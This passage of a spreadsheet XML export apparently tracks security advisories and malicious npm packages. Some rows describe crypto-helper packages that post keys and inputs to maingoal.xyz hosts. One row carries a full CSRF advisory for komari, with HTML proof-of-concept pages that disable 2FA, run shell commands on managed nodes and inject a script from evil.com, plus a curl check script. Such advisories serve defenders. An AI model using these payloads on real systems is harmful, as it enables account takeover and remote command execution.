          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>GHSA-2r37-886p-hj65</t>
        </is>
      </c>
      <c r="D41" s="5" t="inlineStr"/>
      <c r="E41" s="5" t="inlineStr"/>
      <c r="F41" s="5" t="inlineStr"/>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr"/>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr">
        <is>
          <t>npm:@auction-fe/ui-kit</t>
        </is>
      </c>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr"/>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (ef7c357cfafdf0f52aebd8a04514c35bb7a77a0684c8b35fb22d16fb0d16912f)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41" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16109</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>GHSA-2r8h-5pr4-fr3v</t>
        </is>
      </c>
      <c r="D42" s="5" t="inlineStr"/>
      <c r="E42" s="5" t="inlineStr"/>
      <c r="F42" s="5" t="inlineStr"/>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr"/>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr">
        <is>
          <t>npm:sams-run-style</t>
        </is>
      </c>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr"/>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (14b995469abba673b875788358966c5468456f0a911b1f6e3b5ee95c8f14afb1)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42" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16090</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>GHSA-369v-phqf-c9g9</t>
        </is>
      </c>
      <c r="D43" s="5" t="inlineStr"/>
      <c r="E43" s="5" t="inlineStr"/>
      <c r="F43" s="5" t="inlineStr"/>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="inlineStr"/>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr"/>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr">
        <is>
          <t>npm:@vnxsync/libsignal-node</t>
        </is>
      </c>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr"/>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c34a09a0ca8e45d167ab7b26e0b1882a8e2cabffc64495637e884258b3ea57ce)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43" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16083</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>GHSA-4crw-26f5-4v62</t>
        </is>
      </c>
      <c r="D44" s="5" t="inlineStr"/>
      <c r="E44" s="5" t="inlineStr"/>
      <c r="F44" s="5" t="inlineStr"/>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr"/>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr">
        <is>
          <t>npm:amprem-activator</t>
        </is>
      </c>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr"/>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2bb73ef0a9130c0751f253465a40f102cddb6cecdec2835dd7cc9c0f4150efa1)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (3a27a369a049a2e8c6afcd41be97b49ae003a69f8a596cfc0398cb5cc9561a89)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44" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16084</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>GHSA-4qhr-qf46-fcrx</t>
        </is>
      </c>
      <c r="D45" s="5" t="inlineStr"/>
      <c r="E45" s="5" t="inlineStr"/>
      <c r="F45" s="5" t="inlineStr"/>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr"/>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr">
        <is>
          <t>nuget:Microsoft.DiaSymReader.Native</t>
        </is>
      </c>
      <c r="M45" s="5" t="inlineStr">
        <is>
          <t>18.9.0-beta1.26405.2</t>
        </is>
      </c>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr"/>
      <c r="P45" s="5" t="inlineStr"/>
      <c r="Q45" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R45" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="S45" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-4qhr-qf46-fcrx</t>
        </is>
      </c>
    </row>
    <row r="46">
      <c r="A46" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B46" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C46" s="5" t="inlineStr">
        <is>
          <t>GHSA-4x79-pcqv-r9rf</t>
        </is>
      </c>
      <c r="D46" s="5" t="inlineStr"/>
      <c r="E46" s="5" t="inlineStr"/>
      <c r="F46" s="5" t="inlineStr"/>
      <c r="G46" s="5" t="inlineStr"/>
      <c r="H46" s="5" t="inlineStr"/>
      <c r="I46" s="5" t="inlineStr"/>
      <c r="J46" s="5" t="inlineStr"/>
      <c r="K46" s="5" t="inlineStr"/>
      <c r="L46" s="5" t="inlineStr">
        <is>
          <t>npm:@auction-fe/reporting-system</t>
        </is>
      </c>
      <c r="M46" s="5" t="inlineStr"/>
      <c r="N46" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O46" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P46" s="5" t="inlineStr"/>
      <c r="Q46" s="5" t="inlineStr"/>
      <c r="R46" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (9a41fe4ef01818c699bc5c1953702b37cb566a58b0b4769a7ae532b05699b130)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46" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16108</t>
        </is>
      </c>
    </row>
    <row r="47">
      <c r="A47" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B47" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C47" s="5" t="inlineStr">
        <is>
          <t>GHSA-5qr5-f8q7-r844</t>
        </is>
      </c>
      <c r="D47" s="5" t="inlineStr"/>
      <c r="E47" s="5" t="inlineStr"/>
      <c r="F47" s="5" t="inlineStr"/>
      <c r="G47" s="5" t="inlineStr"/>
      <c r="H47" s="5" t="inlineStr"/>
      <c r="I47" s="5" t="inlineStr"/>
      <c r="J47" s="5" t="inlineStr"/>
      <c r="K47" s="5" t="inlineStr"/>
      <c r="L47" s="5" t="inlineStr">
        <is>
          <t>npm:pumpswap-sdk-v1</t>
        </is>
      </c>
      <c r="M47" s="5" t="inlineStr"/>
      <c r="N47" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O47" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P47" s="5" t="inlineStr"/>
      <c r="Q47" s="5" t="inlineStr"/>
      <c r="R47" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">pumpswap-sdk-v1@0.0.1 presents crypto helpers for the PumpSwap SDK, but validate(input) base64-encodes its argument and POSTs it to https://pumpswap-sdk.maingoal.xyz/v1/check through check_validator() in dist/index.js, and randomBytes(size) forwards the hex output of crypto.randomBytes to the same host before returning it. Nothing runs on install or import; the send happens on the first call. The bundled pumpswap-sdk.rar holds a copy of the same source. Same publisher (luisdary) as raydium-clmm-sdk, crypto-validates and polygon-toolkits-validator.
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (542bdf00bacaa82bf9fea14d555598448a7bbff0f9514b2dd780be9e6d000c2a)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47" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16088</t>
        </is>
      </c>
    </row>
    <row r="48">
      <c r="A48" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B48" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C48" s="5" t="inlineStr">
        <is>
          <t>GHSA-c74p-4c5p-6v9r</t>
        </is>
      </c>
      <c r="D48" s="5" t="inlineStr"/>
      <c r="E48" s="5" t="inlineStr"/>
      <c r="F48" s="5" t="inlineStr"/>
      <c r="G48" s="5" t="inlineStr"/>
      <c r="H48" s="5" t="inlineStr"/>
      <c r="I48" s="5" t="inlineStr"/>
      <c r="J48" s="5" t="inlineStr"/>
      <c r="K48" s="5" t="inlineStr"/>
      <c r="L48" s="5" t="inlineStr">
        <is>
          <t>npm:@convertics/script</t>
        </is>
      </c>
      <c r="M48" s="5" t="inlineStr"/>
      <c r="N48" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O48" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P48" s="5" t="inlineStr"/>
      <c r="Q48" s="5" t="inlineStr"/>
      <c r="R48" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (c37417c930b89008560cef36221b6b5abf86f4d84bf6c061f93858b395c81eb4)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48" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16110</t>
        </is>
      </c>
    </row>
    <row r="49">
      <c r="A49" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B49" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C49" s="5" t="inlineStr">
        <is>
          <t>GHSA-cmwm-j5px-xrpf</t>
        </is>
      </c>
      <c r="D49" s="5" t="inlineStr"/>
      <c r="E49" s="5" t="inlineStr"/>
      <c r="F49" s="5" t="inlineStr"/>
      <c r="G49" s="5" t="inlineStr"/>
      <c r="H49" s="5" t="inlineStr"/>
      <c r="I49" s="5" t="inlineStr"/>
      <c r="J49" s="5" t="inlineStr"/>
      <c r="K49" s="5" t="inlineStr"/>
      <c r="L49" s="5" t="inlineStr">
        <is>
          <t>npm:polygon-toolkits-validator</t>
        </is>
      </c>
      <c r="M49" s="5" t="inlineStr"/>
      <c r="N49" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O49" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P49" s="5" t="inlineStr"/>
      <c r="Q49" s="5" t="inlineStr"/>
      <c r="R49" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">polygon-toolkits-validator@1.1.4 exports Node crypto helper wrappers, but validate(input) base64-encodes its argument and POSTs it to https://raydium-clmm.maingoal.xyz/v1/check as {action: "validator", content: btoa(input)} through check_validator() in dist/index.js, then returns true without validating anything, and randomBytes(size) forwards the hex output of crypto.randomBytes to the same host before returning it, so any key or nonce generated through it is disclosed at creation. Nothing runs on install or import; the send happens on the first call to either export. dist/index.js is the same file as crypto-validates@0.0.2 from the same npm account (luisdary), which also published raydium-clmm-sdk and pumpswap-sdk-v1 with the same function against *.maingoal.xyz. The check_validator shape matches MAL-2026-4642, MAL-2026-10640 and MAL-2026-10641, which used other hosts.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (247ced1b39382952aa5c665774c77a1c321b80b13d29f7118e938d85ef720c23)
The package ships only a minified dist bundle that re-exports familiar node:crypto names (createCipheriv, createDecipheriv, createPrivateKey, randomBytes, checkPrime, scrypt), presenting itself as a drop-in crypto shim. Two exported paths covertly transmit sensitive data to a hardcoded remote host: randomBytes(n) generates bytes via crypto.randomBytes(n).toString('hex') and then passes the hex string to an internal check_validator() before returning it, and the exported validate() likewise passes its caller-supplied argument to check_validator(). check_validator() POSTs the value, base64-encoded, to https://raydium-clmm.maingoal.xyz/v1/check with body {action:"validator",content:btoa(e)}. The destination is hardcoded, not caller-configurable, and unrelated to the declared 'Polygon toolkits validator' purpose. Callers use randomBytes for keys, IVs, nonces, and seeds, and pass sensitive strings (private keys, mnemonics, transaction payloads) to validate(); those values are transmitted to the operator on every call, enabling reproduction of derived keys/nonces and disclosure of caller inputs.
## Source: ghsa-malware (6c6493dc8ede3bc3d88353d577d82ca96073206d90f776147fe050a3b61bda64)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49" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16087</t>
        </is>
      </c>
    </row>
    <row r="50">
      <c r="A50" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B50" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C50" s="5" t="inlineStr">
        <is>
          <t>GHSA-cq4p-x9wg-m5wv</t>
        </is>
      </c>
      <c r="D50" s="5" t="inlineStr"/>
      <c r="E50" s="5" t="inlineStr"/>
      <c r="F50" s="5" t="inlineStr"/>
      <c r="G50" s="5" t="inlineStr"/>
      <c r="H50" s="5" t="inlineStr"/>
      <c r="I50" s="5" t="inlineStr"/>
      <c r="J50" s="5" t="inlineStr"/>
      <c r="K50" s="5" t="inlineStr"/>
      <c r="L50" s="5" t="inlineStr">
        <is>
          <t>npm:raydium-clmm-sdk</t>
        </is>
      </c>
      <c r="M50" s="5" t="inlineStr"/>
      <c r="N50" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O50" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P50" s="5" t="inlineStr"/>
      <c r="Q50" s="5" t="inlineStr"/>
      <c r="R50" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">raydium-clmm-sdk 0.0.1 and 0.0.2 (identical dist/index.js) present crypto helpers for the Raydium CLMM, but initKeypair(content) base64-encodes its argument and POSTs it to https://raydium-clmm.maingoal.xyz/v1/check through check_validator(), and randomBytes(size) forwards the hex output of crypto.randomBytes to the same host before returning it. Nothing runs on install or import; data leaves on the first call to either export. The README claims the package contains only type definitions. Same publisher (luisdary) and host as crypto-validates and polygon-toolkits-validator.
---
_-= Per source details. Do not edit below this line.=-_
## Source: ghsa-malware (0db01a66db01ac1e51b8171b417c65e6fe86cc542a453d4a495e0238ca137f5d)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50" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16089</t>
        </is>
      </c>
    </row>
    <row r="51">
      <c r="A51" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B51" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C51" s="5" t="inlineStr">
        <is>
          <t>GHSA-fw7g-gr3j-7wf7</t>
        </is>
      </c>
      <c r="D51" s="5" t="inlineStr"/>
      <c r="E51" s="5" t="inlineStr"/>
      <c r="F51" s="5" t="inlineStr"/>
      <c r="G51" s="5" t="inlineStr"/>
      <c r="H51" s="5" t="inlineStr"/>
      <c r="I51" s="5" t="inlineStr"/>
      <c r="J51" s="5" t="inlineStr"/>
      <c r="K51" s="5" t="inlineStr"/>
      <c r="L51" s="5" t="inlineStr">
        <is>
          <t>npm:@versacode/baileys</t>
        </is>
      </c>
      <c r="M51" s="5" t="inlineStr"/>
      <c r="N51" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O51" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P51" s="5" t="inlineStr"/>
      <c r="Q51" s="5" t="inlineStr"/>
      <c r="R51" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4fb56d60eb9a1df8a4b6dc87789234366b8431047ca01dbce807af874778ffa8)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (d96eff1b72c222420b10f758b5fb58d4a518c72e8c370367877db6ed0a88dda5)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51" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16068</t>
        </is>
      </c>
    </row>
    <row r="52">
      <c r="A52" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B52" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C52" s="5" t="inlineStr">
        <is>
          <t>GHSA-gg93-mm5f-23v8</t>
        </is>
      </c>
      <c r="D52" s="5" t="inlineStr"/>
      <c r="E52" s="5" t="inlineStr"/>
      <c r="F52" s="5" t="inlineStr"/>
      <c r="G52" s="5" t="inlineStr"/>
      <c r="H52" s="5" t="inlineStr"/>
      <c r="I52" s="5" t="inlineStr"/>
      <c r="J52" s="5" t="inlineStr"/>
      <c r="K52" s="5" t="inlineStr"/>
      <c r="L52" s="5" t="inlineStr">
        <is>
          <t>npm:@vallensofficial/baileys</t>
        </is>
      </c>
      <c r="M52" s="5" t="inlineStr"/>
      <c r="N52" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O52" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P52" s="5" t="inlineStr"/>
      <c r="Q52" s="5" t="inlineStr"/>
      <c r="R52" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (02adc12975b9798883d78640d5cab1a73420818d23fbd192ebb76a384f056d54)
The package was found to contain malicious code or consuming dependency that contains malicious code
## Source: ghsa-malware (03e59bf62f2166c346075fbb0b61864404a5a27e9a3d0ae3d57c75da79120ccb)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52" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16067</t>
        </is>
      </c>
    </row>
    <row r="53">
      <c r="A53" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B53" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C53" s="5" t="inlineStr">
        <is>
          <t>GHSA-hxjg-93wc-h8p8</t>
        </is>
      </c>
      <c r="D53" s="5" t="inlineStr"/>
      <c r="E53" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F53" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G53" s="5" t="inlineStr"/>
      <c r="H53" s="5" t="inlineStr"/>
      <c r="I53" s="5" t="inlineStr"/>
      <c r="J53" s="5" t="inlineStr"/>
      <c r="K53" s="5" t="inlineStr"/>
      <c r="L53" s="5" t="inlineStr">
        <is>
          <t>go:github.com/komari-monitor/komari</t>
        </is>
      </c>
      <c r="M53" s="5" t="inlineStr">
        <is>
          <t>0.0.0-20260609084633-98122fa4d110</t>
        </is>
      </c>
      <c r="N53" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O53" s="5" t="inlineStr"/>
      <c r="P53" s="5" t="inlineStr"/>
      <c r="Q53" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R53" s="5" t="inlineStr">
        <is>
          <t># Vulnerability Overview
The `session_token` cookie is set **without** the `SameSite` or `Secure` attributes (`login.go:68`).
All `/api/admin/` management endpoints rely solely on this cookie for authentication, with **no CSRF token or Origin validation**.
**The server-side vulnerability is confirmed to exist; however, exploitation via cross-site requests is mitigated in modern browsers by the default `SameSite=Lax` behavior.**
## Root Cause
```go
// komari-main/api/public/login.go:68
c.SetCookie("session_token", session, 2592000, "/", "", false, true)
//   Secure=false, SameSite not explicitly set
//   Admin route group (server.go:213-343) has no CSRF middleware
```
Gin's `ShouldBindJSON` does not strictly validate the `Content-Type` header, allowing `text/plain` requests to bypass CORS preflight.
## Browser Limitations
- Chrome 80+ (Feb 2020), Firefox 103+ (Jul 2022), and Safari all default unspecified cookies to `SameSite=Lax`.
- Cookies without an explicit `SameSite` attribute **are not included in cross-site POST requests**.
- As a result, the server receives requests without the session cookie and returns **HTTP 401 Unauthorized**.
| Scenario | Exploitable |
|----------|-------------|
| Cross-site HTML (modern browsers) | ✗ Blocked by `SameSite=Lax` |
| Cross-site HTML (Chrome &lt;80 / legacy browsers) | ✓ |
| Same-origin context (Browser Console / existing XSS) | ✓ |
| Man-in-the-middle over HTTP (`Secure=false`) | ✓ |
## High-Impact Operations Reachable via CSRF
| Endpoint | Method | Impact |
|----------|--------|--------|
| `/api/admin/task/exec` | POST | Execute arbitrary shell commands on managed nodes |
| `/api/admin/2fa/disable` | POST | Disable administrator two-factor authentication |
| `/api/admin/settings/` | POST | Modify system configuration |
| `/api/admin/upload/backup` | POST | Upload a malicious backup |
| `/api/admin/record/clear/all` | POST | Delete all monitoring records |
| `/api/admin/client/:uuid/edit` | POST | Modify client configuration |
| `/api/admin/client/:uuid/remove` | POST | Remove managed clients |
| `/api/admin/session/remove/all` | POST | Invalidate all active sessions |
| `/api/admin/settings/cloudflared/start` | POST | Start a Cloudflared tunnel |
## PoC 1 — Disable 2FA
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;iframe name="sink" style="display:none"&gt;&lt;/iframe&gt;
&lt;form id="f" method="POST"
      action="https://komari.example.com/api/admin/2fa/disable"
      target="sink"&gt;&lt;/form&gt;
&lt;script&gt;
  document.getElementById('f').submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## PoC 2 — Remote Command Execution
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;script&gt;
var KOMARI = "https://komari.example.com";
var CMD    = "id &amp;&amp; hostname &amp;&amp; whoami";
fetch(KOMARI + "/api/admin/client/list", { credentials: "include" })
  .then(function(r){ return r.json(); })
  .then(function(data){
    var nodes = data.data || [];
    var uuids = [];
    for (var i = 0; i &lt; nodes.length; i++) {
      if (nodes[i].uuid) uuids.push(nodes[i].uuid);
    }
    if (uuids.length === 0) return;
    return fetch(KOMARI + "/api/admin/task/exec", {
      method: "POST",
      credentials: "include",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({ command: CMD, clients: uuids })
    });
  });
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## PoC 3 — Modify System Configuration
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;script&gt;
var KOMARI = "https://komari.example.com";
fetch(KOMARI + "/api/admin/settings/", {
  method: "POST",
  credentials: "include",
  headers: { "Content-Type": "application/json" },
  body: JSON.stringify({
    "site_name": "Pwned",
    "custom_head": "&lt;script src='https://evil.com/hook.js'&gt;&lt;\/script&gt;"
  })
});
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## PoC 4 — Clear All Monitoring Records
```html
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;&lt;title&gt;Loading...&lt;/title&gt;&lt;/head&gt;
&lt;body&gt;
&lt;iframe name="sink" style="display:none"&gt;&lt;/iframe&gt;
&lt;form id="f" method="POST"
      action="https://komari.example.com/api/admin/record/clear/all"
      target="sink"&gt;&lt;/form&gt;
&lt;script&gt;
document.getElementById('f').submit();
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
```
## Verification Script
```bash
#!/bin/bash
KOMARI="${1:-https://komari.example.com}"
echo "=== CSRF Verification ==="
echo "[1] Cookie Attributes..."
curl -s -D - -o /dev/null \
  -X POST "$KOMARI/api/public/login" \
  -H "Content-Type: application/json" \
  -d '{"username":"test","password":"test"}' | grep -i 'set-cookie'
echo ""
echo "[2] CORS Headers..."
curl -s -D - -o /dev/null \
  -H "Origin: https://evil.com" \
  "$KOMARI/api/public/config" | grep -i 'access-control'
echo ""
echo "[3] CSRF Protection on Admin Endpoint..."
CODE=$(curl -s -o /dev/null -w "%{http_code}" \
  -X POST "$KOMARI/api/admin/settings/" \
  -H "Content-Type: application/json" \
  -H "Origin: https://evil.com" \
  -d '{}')
echo "    HTTP ${CODE} — A 401 response indicates that only session authentication is enforced and no CSRF protection is present."
```</t>
        </is>
      </c>
      <c r="S53" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-hxjg-93wc-h8p8</t>
        </is>
      </c>
    </row>
    <row r="54">
      <c r="A54" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B54" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C54" s="5" t="inlineStr">
        <is>
          <t>GHSA-mf7q-r4rv-jv94</t>
        </is>
      </c>
      <c r="D54" s="5" t="inlineStr"/>
      <c r="E54" s="5" t="inlineStr"/>
      <c r="F54" s="5" t="inlineStr"/>
      <c r="G54" s="5" t="inlineStr"/>
      <c r="H54" s="5" t="inlineStr"/>
      <c r="I54" s="5" t="inlineStr"/>
      <c r="J54" s="5" t="inlineStr"/>
      <c r="K54" s="5" t="inlineStr"/>
      <c r="L54" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/crossplane/crossplane-runtime/v2</t>
        </is>
      </c>
      <c r="M54" s="5" t="inlineStr">
        <is>
          <t>2.3.3, 2.4.0-rc.1</t>
        </is>
      </c>
      <c r="N54" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O54" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P54" s="5" t="inlineStr"/>
      <c r="Q54" s="5" t="inlineStr"/>
      <c r="R54" s="5" t="inlineStr">
        <is>
          <t>Signature verification TOCTOU allows installing unverified package content in github.com/crossplane/crossplane-runtime/v2</t>
        </is>
      </c>
      <c r="S54" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GO-2026-6302</t>
        </is>
      </c>
    </row>
    <row r="55">
      <c r="A55" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B55" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C55" s="5" t="inlineStr">
        <is>
          <t>GHSA-mqvm-gmc4-6rv2</t>
        </is>
      </c>
      <c r="D55" s="5" t="inlineStr"/>
      <c r="E55" s="5" t="inlineStr"/>
      <c r="F55" s="5" t="inlineStr"/>
      <c r="G55" s="5" t="inlineStr"/>
